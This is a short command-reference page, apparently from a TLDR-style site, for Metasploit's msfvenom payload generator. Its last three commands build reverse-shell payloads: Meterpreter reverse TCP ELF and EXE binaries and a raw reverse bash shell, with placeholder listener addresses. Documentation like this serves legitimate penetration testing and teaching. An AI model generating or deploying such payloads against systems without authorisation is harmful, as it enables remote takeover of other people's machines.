LinuxCommandLibrary

msfvenom

Manually generate payloads for metasploit.

TLDR

List payloads

$ msfvenom -l payloads
copy


List formats
$ msfvenom -l formats
copy


Show payload options
$ msfvenom -p [payload] --list-options
copy


Create an ELF binary with a reverse TCP handler
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] -f elf -o [path/to/binary]
copy


Create an EXE binary with a reverse TCP handler
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] -f exe -o [path/to/binary.exe]
copy


Create a raw bash with a reverse TCP handler
$ msfvenom -p cmd/unix/reverse_bash LHOST=[local_ip] LPORT=[local_port] -f raw
copy

Copied to clipboard